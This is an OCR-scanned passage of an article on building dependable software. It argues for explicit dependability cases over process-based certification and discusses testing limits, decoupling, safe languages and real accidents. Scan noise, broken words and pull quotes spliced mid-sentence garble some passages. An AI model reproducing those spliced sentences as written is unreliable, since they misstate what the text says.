potential for disaster that lie within.” 


| 


Similar signals have been 

asent, for example, in the fields of 
electronic voting,” air traffic control,» 
nuclear power,” and energy distribution.” 


3 eee ae AG: eae a | 
The growing tendency to embed 
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software in powerful and in- 
vasive physical devices brings 
greater risk, especially in medi- 
cine, where software can save lives 
but also kill.°° Software problems 
led to the recall of 200,000 implanted 
pacemakers and defibrillators between 
1990 and 2000.* In the 20 years prior to 
2005, the U.S. Food and Drug Adminis- 
tration (FDA) recorded 30,000 deaths 
and 600,000 injuries from medical- 
device failures.” How many of these in- 
cidents can be attributed to software is 
unclear, though separate studies have 
found that about 8% of medical-device 
recalls are software-related. Moreover, 
few of the device failures that occur— 
perhaps only 1 in 40—are actually re- 
ported," so the actual incidence of in- 
juries is likely to be higher. 

What would it take to make soft- 
ware more dependable? Until now, 
most approaches have been indirect, 
involving practices—processes, tools, or 
techniques—believed to yield depend- 
able software. The case for dependability 
has thus rested on the extent to which 
the developers adhered to these prac- 
tices. This article argues that developers 


, 
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SS 
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SN 


should instead produce direct evidence 
of their software’s dependability. The 
potential advantages of this approach 
are greater credibility (as the claim is 
not contingent on the effectiveness of 


_ the practices)and reduced cost (because 
_ development resources can be focused 


where they have the most impact). 


The Need for a Direct Approach 
A dependable system is one you can 
depend on—that is, you can place your 


trust in it. A rational person or organiza- | 


tion only does this with evidence that the 
system’s benefits far outweigh its risks. 


| Without such evidence, a system cannot 


be depended on, in much the same way 
that a download from an unknown Web 
site cannot be said to be “safe” just be- 
cause it happens not to harbor a virus. 
Perhaps in the future we will know 
enough about software-development 
practices that the very use of a particu- 
lar technique will constitute evidence 
of the resulting software’s quality. 
Today, however, we are far from that 
goal. Although individual companies 
can predict defect rates within product 
families based on historical data, in- 
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dustrywide data collection and analy- 
sis barely exist. 

Contrast software systems with cars, 
for example. In the U.S., the National 
Highway Traffic Safety Administra- 
tion (NHTSA) maintains several data- 
bases that include records of all fatal 
accidents—approximately 40,000 a 
year—and data about how particular 
models fare in crashes. Researchers 
can use this data to correlate risk with 
design features. NHTSA also receives 
data from auto companies regarding 
warranty claims, defects, and customer 
complaints. Similarly, the National 
Transportation Safety Board (NTSB), 
best known for its work in aviation, 
analyzes highway accidents and issues 
reports on, among other things, the ef- 
ficacy of safety devices such as seatbelts 
and airbags. 

The software industry has no com- 
parable mechanism, and as a society 
we have almost no data on the causes 
or effects of software failure. Producers 
of software therefore cannot benefit 
from industry data that would improve 
their designs and development strate- 
gies, and consumers cannot use such 
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data to make informed purchasing de- 
cisions. 

Actually, where data is collected, it 
is often suppressed; many companies 
withhold even basic information about 
the number and severity of defects 
in their products, even when issuing 
patches that purport to resolve them. 
And no government agency is charged 
with investigating software failures or 
even recording software-related fatal 


accidents. When an accident report | 


does implicate software, it rarely in- 
cludes enough information to allow 
any general lessons to be learned. 

Over the past few decades we have 
developed approaches and technolo- 
gies that can dramatically improve the 
quality of software. They include better 
platforms (safe programming languag- 
es, operating systems with address- 
space separation, virtual machines), 
better development infrastructure 


(configuration control, bug tracking, | 


traceability), better processes (spiral 


and agile models, prototyping), and | 


better tools (integrated environments, 
static analyzers, model checkers). 
Moreover, we have made progress in 
understanding the fundamentals, for 
example, of problem structuring, de- 
sign modeling, software architecture, 
verification, and testing. All of these 
advances can be misused, however, 
and none of them guarantees success. 
The field of empirical software develop- 
ment is attempting to fill the gap and 
provide scientific measures of efficacy, 
but there is still no evidence compel- 
ling enough that simply using a given 
approach establishes with confidence 
the quality of the resulting system. 
Many certification standards were 
devised with the good intent of enforc- 
ing best practices, but they have had 
the opposite effect. Instead of encour- 
aging the selection of the best tool for 
the job, and directing attention to the 
most critical aspects of a system and 
its development, they impose burden- 
some demands to apply the same—of- 
ten outdated—techniques uniformly, 
resulting in voluminous documenta- 
tion of questionable value. The Com- 
mon Criteria security certification that 


Microsoft obtains for its operating sys- | 


tems, for example, costs more than its 
internally devised mitigations but is 
believed by the company to be far less 
effective. 
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| developer’s repertoire, and the use of | 


Government agencies are often in 


| the unfortunate position of having to 


evaluate complex software systems 
solely on the basis of evidence that 


some process, however arbitrary, was | 


adhered to and some amount of test- 
ing, whether conclusive or not, was per- 
formed. Not surprisingly, certified sys- 
tems sometimes fail catastrophically. 
A particularly tragic example was the 
failure of an FDA-certified radiation- 
therapy machine in Panama in 2001;” 
fatal overdoses resulted from poorly en- 
gineered software in an incident remi- 
niscent of the Therac failures of 15 years 
earlier. Even the most highly regarded 
standards demand expensive practices 
whose value is hard to assess. DO178B, 
for example, the safety standard used in 
the U.S. for avionics systems, requires a 
level of test coverage known as MCDC 
that is extremely costly and whose ben- 
efits studies have yet to substantiate." 
A very different approach, some- 
times called “goal-based” or “case- 
based” certification, is now gaining 
currency. Instead of particular prac- 
tices being mandated, the developer 
is instead called upon to provide direct 
evidence that the particular system sat- 


isfies its claimed dependability goals. | 
| Inthe U.K., the Ministry of Defence has 


dramatically simplified its procure- 
ment standards for software under this 
approach, with contractors providing 
“software reliability cases” to justify 
the system. Even in the early stages, a 
reliability case is required to defend 
the proposed architecture and to show 
that the contractor is capable of mak- 
ing a case for the development itself.’ 


This direct approach has not yet | 


been adopted by American certifiers 
and procurers. Recently, however, a 
number of governmentagencies, spear- 
headed by the High Confidence Soft- 
ware and Systems Coordinating Group, 
funded a National Academies study to 


address widespread concerns about | 


the costs and effectiveness of existing 
approaches to software dependability.” 
The direct approach recommended by 
the study is the basis of this article. 


Why Testing Isn’t Good Enough 
Testing is a crucial tool in the software 


automated tests—especially “regres- 
sion tests” for catching defects intro- 
duced by modifications—is a mark of 
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| competence. More extensive testing 


can only improve the quality of soft- 
ware, and many researchers are rec- 
ognizing the potential for harnessing 
computational resources to increase 
the power of testing yet further. At the 
same time, however, despite the fa- 
mous pronouncement of Edsger Dijk- 
stra that testing can be used to show 
the presence of errors but not their ab- 
sence, there is a widespread folk belief 
that testing is sufficient evidence for 
dependability. 

Everything we know about testing 


| indicates that this belief is false. Al- 


though some small components can be 
tested exhaustively, the state space of 
an entire system is usually so huge that 
the proportion of scenarios executed 
in a typical test is vanishingly small. 
Software is not continuous, so a suc- 
cessful test for one input says nothing 
about the system’s response to a simi- 
lar but distinct input. In practice, it is 
very difficult even to achieve full code 
coverage—that is, with every statement 
of the code being executed. 

An alternative approach is to gener- 
ate tests in a distribution that matches 
the expected usage profile, adjusted 
for risk so that most of the testing ef- 
fort is spent in the most critical areas of 
functionality. But the number of tests 
required to obtain high confidence 
(even with some dubious statistical 
assumptions) is far larger than one 


| might imagine. For example, to claima 
| failure rate of one input in a thousand 


to a 99% confidence, about 5,000 test 
cases are needed, assuming no bugs 
are found.”* If testing reveals 10 bugs, 
nearer to 20,000 subsequent tests with- 
out failure are needed. Contrary to the 
intuition of many programmers, find- 
ing bugs should not increase confi- 
dence that fewer bugs remain; indeed, 
it is evidence that there are more bugs 
to be found. 

Thus while testing may provide ad- 
equate confidence that a program is 
good fora noncritical application, it be- 
comes increasingly difficult and expen- 
sive as higher levels of assurance are 
demanded; under such circumstances, 
testing cannot deliver the confidence 
required at a reasonable cost. Most 
systems will be tested more thoroughly 
by their users than by their developers, 
and will often be executing in unchart- 
ed territory, exploring combinations of 


state components that were not tested 
and perhaps not even considered dur- 
ing design. 

Nevertheless, most certification re- 
gimes still rely primarily on testing. 
Developers and certifiers sometimes 
talk self-assuredly about achieving “five 
nines” of dependability, meaning that 
the system is expected to survive 100,000 
commands or hours before failing. The 
mismatch between such claims and the 
reality of software failures led one pro- 
curer to quip “It’s amazing how quickly 
10° hours comes around.” 


A Direct Approach 

The direct approach, by definition, is 
straightforward. The desired depend- 
ability goal is explicitly articulated as a 
collection of claims that the system has 
some critical properties. An argument, 
or dependability case, is constructed 
that substantiates the claims. The re- 
mainder of this article develops these 
notions and outlines some of their 
implications, but first we turn to the 
fundamental questions of what con- 
stitutes a system and what it means for 
the system to be dependable. 


enterprises, 
dependability is a 
trade-off between 


As in all engineering 


benefits and risks, 


with the level of 


What is a system? An engineered | 


product that is introduced to solve a 
particular problem and that consists 
of software, the hardware platform on 
which the software runs, the peripher- 
al devices through which the product 
interacts with the environment, and 
any other components that contribute 
to achieving the product’s goals (in- 
cluding human operators and users) 
is considered a system. In many cases, 


the system’s designers must assume | 
that its operators behave in a certain | 


way. An air traffic management sys- 
tem, for example, cannot prevent a 
midair collision if a pilot is deter- 
mined to hit another aircraft; elimi- 
nating this assumption would require 
a separation of aircraft that would not 
be economically feasible. When a sys- 
tem’s dependability is contingent on 
assumptions about its operators, they 
should be viewed as a component of 
the system and the design of operat- 
ing procedures regarded as an essen- 
tial part of the overall design. 

What does “dependable” mean? A sys- 
tem is dependable if can be depended 
on—that is, trusted—to perform a par- 
ticular task. As noted earlier, such trust 


is only rational when evidence of the | 


assurance (and the 
quality and cost of 
the evidence) being 
chosen to match 
the risk at hand. 
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system’s ability to act without exhibit- 
ing certain failures has been assessed. 
Soasystem cannot be dependable with- 
out evidence, and dependability is thus 
not merely the absence of defects or 
the failures that may result from them 
but the presence of concrete informa- 
tion suggesting that such failures will 
not occur. 

As in all engineering enterprises, 
dependability is a trade-off between 
benefits and risks, with the level of as- 
surance (and the quality and cost of 
the evidence) being chosen to match 
the risk at hand. Our society is not will- 
ing to tolerate the failure of a nuclear 
power plant, air traffic control center, 
or energy distribution network, so 
for such systems we will be willing to 
absorb larger development and certi- 
fication costs. Criticality depends, of 


course, on the context of use. A spread- 


sheet program becomes critical if it is 
used, say, for calculating radiotherapy 
doses. And there are systems, such as 
GPS satellites and cellphone networks, 
on which so many applications depend 


| that widespread failure could be cata- 


strophic. 

Dependability is not a metric that 
can be measured on a simple numeric 
scale, because different kinds of fail- 
ures have very different consequences. 
The cost of preventing all failures will 
usually be prohibitive, so a dependable 
system will not offer uniform levels of 
confidence across all functions. In fact, 
a large variance is likely to be a charac- 
teristic of a dependable system. Thus 
a dependable radiotherapy system 
may become unavailable but cannot 
be allowed to overdose a patient; a de- 
pendable e-commerce site may display 


_ advertisements incorrectly, give bad 


search results, and perhaps lose shop- 
ping-cart items over time, but it must 
never bill the wrong amount or leak 
customers’ credit card details; a de- 
pendable file synchronizer may report 
spurious conflicts but should never si- 
lently overwrite newer versions of files. 

Together, these considerations im- 
ply that the first steps in developing a 
dependable system involve drawing 
its boundaries—deciding which com- 
ponents in addition to the software, 
physical and human, will be relied on; 
identifying the critical properties; and 


| determining what level of confidence 


is required. 
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Properties and where they reside. So 
far I have talked loosely about a de- 
pendable system performing some 
functions or tasks. But for articulating 
claims about a system’s desired be- | 
havior, this level of granularity is too | 


coarse. It is preferable instead to focus 
on critical properties. Some will be as- 
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sociated with individual functions, but 
more often a property will crosscut sev- 
eral functions. 

For dependability, focusing on 
properties is generally better than fo- 
cusing on functions because the prop- 


_ erties are what matter. Moreover, they | 


can usually be separated more cleanly | 
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| from one another, and they retain their 


meaning as the set of functions offered 
by the system changes over its lifetime. 


| A critical property of a crime database, 
| forexample, may be that every access to 


the database by a user is logged in some 
file. Identifying instead some critical 
subset of logging functions would be 
inferior, as the full correctness of these 
functions would likely be neither nec- 
essary nor sufficient for establishing 
the logging property. Common Crite- 
ria, a certification scheme for security, 
makes this mistake; it focuses atten- 
tion on the security functions alone, 
despite the fact that many attacks suc- 
ceed precisely because they exploit 
loopholes in other functions that were 
not thought to be security-related. 
Some software systems provide an 
entirely virtual service, but most in- 
teract with the physical world. When 
the purpose of a system is to produce, 
control, or monitor particular physi- 
cal phenomena, they should form 
the vocabulary for expressing critical 
properties. This might seem obvious, 
but there is long tradition of writing 
requirements in terms of interfaces 
closer to the software, perhaps because 
it’s easier or because of a division of 
labor that isolates software engineers 
from system-level concerns. In a ra- 


| diotherapy application, for example, 


a critical property is not that the emit- 
ted beam has a bounded intensity, or 
that the right signal is conveyed to the 
beam-generating device, or that the 
beam settings are computed correctly 
in the code. It is that the patient does 
not receive an excessive dose. 

There is a chain of events connect- 


_ ing the ultimate physical effects of the 
| system at one end back through the sig- 


nals of the peripherals in the middle to 
the instructions executed in the code 
at the other end. The more the critical 
property is formulated using phenom- 
ena closer to the software and further 
away from the ultimate effects in the 
real world, the more its correlation to 
the fundamental concerns of the users 
is weakened. 

Aninfamous accident illustrates the 
potentially dire consequences of this 
too-close-to-the-software tendency. An 
Airbus A320 landing at Warsaw Airport 
in 1993 was equipped with an interlock 
intended to prevent the pilot from ac- 
tivating reverse thrust while airborne. 
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Unfortunately, the software had been 
designed to meet a requirement that 
reverse thrust be disabled unless wheel 


pulses were being received (indicating | 


that the wheels were turning and thus 


in contact with the ground). Because of | 


rain on the runway, the aircraft aqua- 
planed when it touched down, and the 
wheels did not turn, so the software 
dutifully disabled reverse thrust and 
the aircraft overran the runway. Had 
the critical property been expressed 
in terms of being on the ground rather 
than receiving wheel pulses, the invalid 
assumption that they were equivalent 
may have been scrutinized more care- 
fully and the flaw detected. (This ac- 
count is simplified; for the full incident 
report see Ladkin”’). 

This view of requirements is due 


to Michael Jackson** and has been ad- | 


opted by Praxis in its REVEAL require- 
ments engineering method.'’ More 
specialized variants of the idea have 
appeared before, most notably in Da- 
vid Parnas’s Four Variable Model.” 


The dependability case. The evidence | 


for dependability takes the form of 


a dependability case—an argument | 


that the software, in concert with other 
components, establishes the critical 
properties. What exactly comprises the 


case—such as how detailed it should | 


be and what mix of formal and infor- 
mal arguments is appropriate —will 
vary between developments, but cer- 
tain features are essential. 


First, the case should be auditable | 


so that it can be evaluated by a third- 
party certifier, independent both of 
developer and customer. The effort of 
checking that the case is sound should 
be much less than the effort of build- 
ing the case in the first place. In this 
respect, a dependability case may be 
like a formal proof: hard to construct 
but easy to check. To evaluate a case, 
a certifier should not need any expert 
knowledge of the developed system or 
of the particular application, although 
it would be reasonable to assume ex- 


pertise in software engineering and fa- | 


miliarity with the domain area. 
Second, the case should be complete. 

This means that the argument that the 

critical properties apply should con- 


tain no holes to be filled by the certi- | 


fier. Any assumptions that are not justi- 


fied should be noted so that it is clear | 


to the certifier who will be responsible 


for discharging them. For example, the 


dependability case may assume that a | 


compiler generates code correctly; or 


that an operating system or middle- | 


ware platform transports messages 
reliably, relying on representations by 
the producers of these components 
that they provide the required proper- 


ties; or that users obey some protocol, | 


relying on the organization that fields 
the system to train them appropriately. 
For a product that is not designed with 
a particular customer in mind, the as- 


sumptions become disclaimers, for | 


example, that an infusion pump may 
fail under water or that a file synchro- 
nizer will work only if applications do 
not subvert file modification dates. As- 
sumptions made to simplify the case, 
and that are no more easily substanti- 


ated by others, are suspect. Suppose | 


an analysis of a program written in C, 
for example, contains an assumption 
that array accesses are within bounds. 
If this assumption cannot readily be 
checked, the results of the analysis 
cannot be trusted. 

Third, the case should be sound. It 
should not, for example, claim full cor- 
rectness of a procedure on the basis of 
nonexhaustive testing; or make unwar- 
ranted assumptions that certain com- 
ponents fail independently; or reason, 
ina program written in a language with 
a weak memory model that the value 
read from a shared variable is the value 
that was last written to it. 


Implications 
On the face of it, these reeommenda- 
tions—that developers express the 
critical properties and make an explicit 
argument that the system satisfies 
them—are hardly remarkable. If fol- 
lowed, however, they would have pro- 
found implications for how software is 
procured, developed, and certified. 
Dependability case as product. In 


theory, one could construct a depend- | 


ability case ex post facto, when the en- 
tire development had been completed. 


In practice, however, this would be | 
| near impossible and, in any case, un- 
desirable. Constructing the case is eas- 


ier and more effective if done hand-in- 
hand with other developmentactivities, 


when the rationale for development | 


decisions is fresh and readily available. 
But there is a far more important rea- 
son to consider the dependability case 
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from the very outset of development. 
By focusing on the case, the developer 
can make decisions that ease its con- 
struction, most notably by designing 
the system so that critical properties 
are easier to establish. Decoupling and 


_ simplicity, discussed later, offer per- 


haps the greatest opportunities here. 

This is the key respect in which 
the direct approach to dependabil- 
ity demands a sea change in attitude. 
Rather than just setting in place some 
practices or disciplines that are in- 
tended to improve dependability, the 
developers are called upon, every step 
of the way, to consider their decisions 
in the light of the system’s depend- 
ability and to view the evidence that 
these decisions are sound as a work 
product that is as integral to the final 
system as the code itself. 

Procurement. A change to a direct ap- 
proach affects not only developers but 
also procurers, and the goals set at the 
start must be realistic in terms both of 
their achievement and demonstration. 

The Federal Aviation Administration 
specified three seconds of downtime 
per year for the infamous Advanced Au- 
tomation System for air-traffic control 
(which was ultimately canceled after 
an expenditure of several billion dol- 
lars), even though it would have taken 
10 years just to obtain the data for sub- 
stantiating such a requirement.’ It was 
later revised to five minutes. 

More fundamentally, however, our 
society as a whole needs to recognize 


_ that the enormous benefits of soft- 


ware inevitably bring risks and that 
functionality and dependability are 
inherently in conflict. If we want more 
dependable software, we will need to 
stop evaluating software on the basis 
of its feature set alone. At the same 
time, we should be more demanding, 
and less tolerant of poor-quality soft- 
ware. Too often, the users of software 
have been taught to blame themselves 
for its failures and to absorb the costs 


_ of workarounds. 


After the failure of the USS York- 
town’s onboard computer system, in 
which the ship’s entire control and 
navigation network went down after an 
officer calibrating a fuel valve entered 
a zero into a database application (in 
an attempt to overwrite a bad value 
that the system had produced), blame 
was initially placed on software. After 
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an investigation, however, the Navy 
cited human error. The ship's com- 
manding officer reported that ‘Man- 
agers are now aware of the problem of 
entering zero into database fields and 
are trained to bypass a bad data field 
and change the value ifsuch a problem 
were to occur again’. 

With the indirect approach to cer- 
tification, it has been traditional that 
procurers give detailed prescriptions 
for how the software should and should 
not be developed and which technolo- 
gies should be used. By contrast, the 
direct approach frees the developer to 
use the best available means to achieve 
the desired goal; constraints on the de- 


velopment are evaluated by the objec- — 


tive measure of whether they improve 
dependability or not. 

Structuring requirements. How re- 
quirements are approached sets the 


tone of the development that follows. | 


A cursory nod to analyzing the problem 
can result in functionality so unrelated 
to the users’ needs that the develop- 
ers become mired in endless cycles 
of refactoring and modification. On 
the other hand, a massive and windy 
document can overwhelm the design- 
ers with irrelevant details and tie their 
hands with premature design deci- 
sions. Ironically, what a requirements 
document says can do as much dam- 
age as what it fails to say. 

In the context of dependability, the 
approach to requirements is especially 
important. The standard criteria of 
course apply: that the developers listen 
carefully to the stakeholders to under- 
stand not merely the functions they say 
they want but also, more deeply, the 
purposes they believe these functions 
will enable them to accomplish; that 
the requirements be expressed precise- 
ly and succinctly; and that great care be 
taken to avoid making irrevocable de- 
cisions when they could be postponed 
and made later on the basis of much 
fuller information. 

Two other criteria take on greater 
significance, however. Deciding which 
requirements are critical (and how crit- 
ical they are) is the first and most vital 
design step, determining in large part 
the cost of the system and the contexts 
in which it will usable. The architec- 
ture of the system will likely be based 
on these requirements, because (as ex- 
plained later) the most feasible way to 
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offer high dependability at reasonable 
cost is to exploit modularity to estab- | 


lish critical properties locally. 

Second, it is important to clearly 
record any assumptions made about 
the software’s operating environment 
(including the behavior of human op- 
erators). These assumptions will be an 
integral part of the dependability case, 
influence the design, and become crite- 
ria for evaluating the contexts in which 
the software can be deployed. 

These two criteria are hardly new, 
but they are not always followed. Per- 
haps under pressure from customers 
to provide an extensive catalog of fea- 
tures, analysts often express require- 
ments as a long list of functions. In a 
radiotherapy application, for example, 
the analyst—aware of the risk of deliv- 
ering incorrect doses or of unauthor- 
ized access—might include sections 
describing the various functions or use 
cases associated with selecting doses or 
logging in but might neglect the more 
important task of describing the most 
critical properties explicitly—such as 
that the delivered dose corresponds to 
the prescribed dose and that access be 
restricted to certain staff. 

Sometimes developers appreciate 


the value of prioritization but have been | 


shy to make the bold decisions neces- 
sary for downgrading (or eliminating) 
noncritical requirements. Rather than 
asking “What are the critical proper- 
ties?” we might instead ask “What 
properties are not critical?” If we have 
trouble answering this latter question, 
the properties that are critical have 
probably not been identified correctly. 
Decoupling and simplicity. How 
much the cost of developing a system 
will increase if a particular critical 


| property is to be assured depends on 


how much of the system is involved. 
If the critical property is not local- 
ized, the entire codebase must be ex- 
amined to determine whether or not 
it holds—in essence, all of the code 
becomes critical. But if the property 
is localized to a single component, at- 
tention can be focused on that com- 


ponent alone, and the rest of the code- | 


base can be treated as noncritical. Put 


Decoupling is the key to achieving 
locality. Two components are decou- 
pled if the behavior of one is unaffected 
by that of the other. Maximizing decou- 
pling is a guiding principle of software 
design in general, but it is fundamental 
to dependability. It is addressed first 
during requirements analysis by defin- 
ing functions and services so that they 
are self-contained and independent 
of one another. Then, during design, 
decoupling is addressed by allocat- 
ing functionality to particular compo- 
nents, which allows key invariants to be 
localized and the minimization of com- 
munication; and by crafting interfaces 
that do not expose the internals of a 
service to its clients and do not connect 
clients to each other unnecessarily. Fi- 
nally, the decoupling introduced in the 
design must be realized in the code by 
using appropriate language features to 
protect against errors that might com- 
promise it. 

The design ofan e-commerce system, 
for example, might enforce a rigorous 
separation between billing and other 
subsystems; in that way, more complex 
(and less dependable) code can be writ- 
ten for less critical features (such as 
product search) without compromising 
essential financial properties. 

Decoupling is an important way of 
securing simplicity, and its benefits, in 
system design. As Tony Hoare famous- 
ly said in his Turing Award lecture (dis- 
cussing the design of Ada): “[T]here 


_ are two ways of constructing a soft- 


another way, the cost of making a sys- | 
' complicated and critical domain faces 


tem dependable should vary not with 
the size of the whole system but with 
the extent and complexity of the criti- 
cal properties. 
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ware design: One way is to make it so 
simple there are obviously no deficien- 
cies; and the other way is to make it so 
complicated that there are no obvious 
deficiencies.” Many practitioners are 
resistant to the claim that simplicity is 
possible (and some even to the claim 
that it is desirable). They tend to think 
that the advocates of simplicity do not 
recognize the inherent complexity of 
the problems solved by computer sys- 
tems or that they imagine that simplic- 
ity is easily achieved. 

Simplicity is not easy to achieve, 
and, as Alan Perlis noted in one of his 
famous aphorisms, it tends to follow 
complexity rather than precede it. The 
designer of a system that will work ina 


difficult problems. The question is not 
whether complexity can be eliminated 
but whether it can be tamed so that the 


resulting system is as simple as possi- 
ble under the circumstances. The cost 


of simplicity may be high, but the cost — 


of lowering the floodgates to complex- 
ity is higher. Edsger Dijkstra explained: 
“The opportunity for simplification is 
very encouraging, because in all exam- 
ples that come to mind the simple and 


elegant systems tend to be easier and | 


faster to design and get right, more effi- 
cient in execution, and much more re- 
liable than the contrived contraptions 
that have to be debugged into some de- 
gree of acceptability.”* 


Process and culture. While process | 


may not be sufficient for dependability, 
it is certainly necessary. A rigorous pro- 
cess will be needed to ensure that atten- 
tion is paid to the dependability case 
and to preserve the chain of evidence 
as it is constructed. In the extreme, if 
there is no credible process, a certi- 
fier has no reason to believe that the 
deployed software even corresponds 
to the software that was certified. For 
example, in a well-known incident in 
2003 an electronic voting system was 
certified for use in an election but a 
different version of the system was in- 
stalled in voting booths.*® 

A rigorous process need not be a 
burdensome one. Because every en- 
gineer involved in a project is expect- 


ed to be familiar with the process, it | 


should be described by a brief and eas- 
ily understood handbook, tailored if 


necessary to that project. Rather than | 


interfering with the technical work, 
the process should eliminate a mass 
of small decisions, thereby freeing 
the engineers to concentrate on the 
more creative aspects of the project. 
Standards for machine-processable 
artifacts—especially code—should be 
designed to maximize opportunities 
for automation. For example, a coding 
standard that mandates how variables 
are named and how specification com- 
ments are laid out can make it possible 
to extract all kinds of cross-referencing 
and summarization information with 
lexical tools alone. Bill Griswold has 
observed that the more the program- 
mer embeds semantic information in 


the naming conventions of the code, | 


the more readily it can be exploited.” 
One of the paradoxes of software cer- 
tification is that burdensome processes 
(such as requiring MCDC test coverage) 
do seem to be correlated with more de- 


The question is 
not whether 
complexity can 
be eliminated but 
whether it can 

be tamed so that 
the resulting 
system is as 
simple as possible 
under the 
circumstances. 
The cost of 
simplicity may be 
high, but the cost 
of lowering the 


floodgates 
to complexity 


is higher. 
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pendable software, even though there 
is little compelling evidence that the 
processes themselves achieve their 
stated aims. This may be explained 
by a social effect. The companies that 
adhere to the strictest processes tend 
to attract and reward employees who 
are meticulous and risk-averse. Hav- 
ing a strong “safety culture” can be 
the major factor in determining how 
safe the products are, and in fact one 
study of formal methods found that 
their success may be due more to the 
culture surrounding them than to any- 
thing more direct. Efforts to build 


and maintain a strong safety culture 


can pay dividends. Richard Feynman, 
in his dissenting report following the 
Challenger inquiry,'° was effusive in his 
praise of the constructively adversarial 
attitude among NASA's software engi- 
neers, to which he ascribed the high 
dependability of their software. 
Advances in software-verification 
technology may tempt us to imagine 


| (in a Leibnizian fantasy) that one day 
_ we will be able to check the depend- 


ability of software simply by running it 
through a machine. But dependability 


~ cases will always contain informal ele- 
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ments that cannot be verified mecha- 
nistically; truth will have to be assessed 
by an impartial review not only of the 
case itself but also of the credibility of 
the organization that produced it. An 
entirely product-based certification ap- 
proach thus makes no more sense than 
one based entirely on process. Given 
that the organization that produces 
the software and the software itself are 
intertwined, attempts at improving de- 
pendability, and efforts to measure it, 
must take both into account. 

Robust foundations. Just as a sky- 
scraper cannot easily be built on sand, 
a robust software system cannot be 
built on a foundation of weak tools 
and platforms. Fifty years after the in- 
vention of static typing and automatic 
memory management, the decision to 
use an unsafe programming language 
such as C or C++ (which provide nei- 
ther) requires serious justification, and 
for a critical system the benefits that 
are obtained in compensation for the 
loss of safety have to be extraordinarily 
compelling. Arguments against safety 
based on performance are usually over- 
stated. And with Java and C# now wide- 
ly known and available, and equipped 
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with impressive libraries, there is no 


longer a reason to consider safe lan- | 


guages as boutique technologies. 

The value of static typing is often 
misunderstood. It is not that type er- 
rors don’t occur during execution. 
They do, because most statically typed 
languages are sufficiently complex that 
some checks are inevitably postponed 


to runtime. Similarly, the value of | 


strong typing is not that runtime type 


errors are more acceptable than other | 


kinds of failure. An unanticipated fail- 
ure is never good news. Moreover, run- 
time type checking can make things 


have been lost had an arithmetic over- 
flow in an irrelevant module not been 
propagated to the top level. 

Strong typing has two primary ben- 
efits. First, it prevents a module from 
writing to regions of memory that it 
cannot name (through local and global 
variables and sequences of field access- 
es). This means that a syntactic depen- 
dence analysis can determine the po- 
tential couplings between modules and 
can be used to establish that one mod- 


making it possible to ignore the latter 
when analyzing the behavior of the for- 
mer. Second, strong typing makes run- 
time failures happen earlier, as soon 
as a type error occurs, rather than later 
when the failure is likely to be harder 
to diagnose and may have done more 
damage. Static typing provides the im- 
portant additional advantage of catch- 


It is important 


to realize that 
arguments that 


are not 
mechanically 
checked are 


likely to be flawed, 


worse: the Ariane 5 rocket might not | 


so their credibility 
must suffer and 
confidence in 

any dependability 


claims that rely 


on them must 
be reduced 


accordingly. 


ule is decoupled from another, thus | 


ing many type errors at compile time. | 


This is extremely valuable, because 


type errors are often symptoms of seri- | 


ous mistakes and structural flaws. 
Complexity in a programming lan- 
guage can compromise dependability 
because it increases the chance that the 
program will behave differently from 
what the programmer envisaged. It is 
important to avoid obscure mecha- 


nisms, especially those that have a 


platform-dependent interpretation. 
Coding standards can be very helpful in 
taming dangerous language features.'* "” 

Progress in language design has 
produced major improvements, but 
old lessons are easily forgotten. The 
original design of Java, for example, 


lacked iterators (as a control construct) | 


and generics, and it did not unify prim- 
itive types and objects, even though 
these features had been part of CLU in 
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| 1975.°’ When it was realized that these 


features were essential, it was too late 
to incorporate them cleanly. It may be 
curmudgeonly to complain about Java, 
especially because it brings so many 
good ideas to mainstream program- 
ming—in particular, strong typing— 


| that might otherwise have languished 
_ in obscurity. And, to be fair, Java incor- 


porates features of older languages in 
a more complex setting; subtyping, in 
particular, makes it much harder to 


| incorporate other features (such as ge- 


nerics). Nevertheless, it does seem sad 
that the languages adopted by industry 
often lack the robustness and clarity of 
their academic predecessors. 

It is important to recognize that de- 
pendability was not the primary goal in 


| the design of most programming lan- 


guages. Java was designed for platform 
independence, and its virtual machine 
includes a class loader that absorbs 
much of the complexity of installation 
variability. Asa result, however, asimple 
call to a constructor in the source code 
sets in motion a formidable amount of 
machinery that could compromise the 
system’s dependability. 

The choice of computing plat- 
form—such as operating system, mid- 
dleware, and database—must also be 
carefully considered. A platform that 
has been widely adopted for general 
applications usually has the advan- 
tage of lower cost and a larger pool of 
candidate developers. But commodity 
platforms are not usually designed for 
critical applications. Thus when high 
dependability is required, enthusiasm 
for their use should be tempered by 
the risks involved. 

The (injsignificance of code. A de- 
pendability argument is a chain with 
a variety of links. One link may argue 
that a software component has some 
property, another that a peripheral be- 
haves in a certain way, yet another that 
a human operator obeys some proto- 
col, and together they might establish 
the end-to-end dependability require- 
ment. But the overall argument is only 
as strong as the chain’s weakest link. 

Many software engineers and re- 
searchers are surprised to learn that 
the correctness of the code is rarely 
that weakest link. In an analysis of fa- 
tal accidents that were attributed to 
software problems, Donald MacKenzie 
found that coding errors were cited as 


causes only 3% of the time.” Problems | 


with requirements and usability dwarf 
the problems of bugs in code, suggest- 
ing that the emphasis on coding prac- 
tices and tools, both in academia and 
industry, may be mistaken. Exploiting 
tools to check arguments at the design 
and requirements level may be more 
important; and it is often more feasi- 
ble, as artifacts at the higher level are 
much smaller.*! 


Nevertheless, the correctness of 


code is a vital link in the dependabil- | 


ity chain. Even if the low incidence of 
failures due to bugs reflects success in 
improving code quality, the cost is still 
unacceptable,'! especially when very 
high assurance is required. Note too 
that in the arena of security, code vul- 
nerabilities are responsible for a much 
higher proportion of failures than in 
the safety arena. 

Testing and analysis. Testing is a cru- 
cial part of any software-development 
process, and its effectiveness can be 
amplified by liberal use of runtime as- 
sertions, by formulating tests early on, 
by creating tests in response to bug re- 
ports, and by integrating testing into 
the build so that tests are run frequent- 
ly and automatically. But as discussed 
above, testing cannot generally deliver 
the high levels of confidence that are 
required for critical systems. Thus 
analysis is needed to fill the gap. 

Analysis might involve any of a va- 
riety of techniques, depending on the 
kind of property being checked and 


the level of confidence required. In the | 


last decade, dramatic advances have 
been made in analyses that establish 
properties of code fully automatically 
through the use of theorem proving, 
static analysis, model checking, and 
model finding. 

How well these techniques will work 
and how widely they will be adopted 
remain to be seen. But a number of 
industrial successes demonstrate that 
the approaches are at least feasible 
and, in the right context, effective. 
Microsoft, for example, now includes 
a sophisticated verification compo- 
nent in its driver development toolkit;? 
Praxis has achieved extraordinarily low 
defect rates using a variety of formal 
methods;'° and Airbus has used static 
analysis to show the absence of low-ley- 
el runtime errors in the A340 and A380 
